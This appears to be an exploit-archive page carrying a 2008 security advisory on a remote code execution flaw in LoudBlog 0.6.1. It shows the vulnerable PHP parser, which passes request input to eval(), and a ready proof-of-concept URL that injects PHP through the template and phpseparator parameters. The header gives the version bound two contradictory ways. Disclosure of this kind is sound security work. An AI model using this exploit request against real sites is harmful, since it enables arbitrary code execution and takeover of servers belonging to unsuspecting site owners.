[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : LoudBlog <= 0.6.1 (parsedpage) Remote Code Execution Vulnerability
# Published : 2008-01-06
# Author : Eugene Minaev
# Previous Title : PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities
# Next Title : Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability
----[ Loudblog Remote Code Execution ... ITDefence.ru Antichat.ru ]
Loudblog >= 0.6.1 Remote Code Execution
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________
/ . / /_// // / / __ /__/ /
/ / /_// / / / / / /___/
/ / / / / / / / /
/ / / / / / / /__ //
/ ____________/ / / __________// /__ // /
/\ _______/ ________________/____/ 2007 /_//_/ // //
\ // // /
. \ -[ ITDEFENCE.ru Security advisory ]- // // / .
. _\________[________________________________________]_________//_//_/ . .
Template parser function
<?php
$parsedpage = fullparse(firstparse(hrefmagic($template)));
//do we have php code within our template? switch between echo and eval!
if ($php_use) {
$templatepieces = explode ($phpseparator, $parsedpage);
for ($i = 0; $i <= count($templatepieces); $i += 2) {
echo $templatepieces[$i];
if (isset($templatepieces[$i+1])) eval ($templatepieces[$i+1]);
}
//no php code, no eval!
} else {
echo $parsedpage;
}
?>
loudblog/inc/parse_old.php?template=@phpinfo();@&php_use=1&phpseparator=@&parsedpage=@phpinfo();@
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# www.Syue.com [2008-01-06]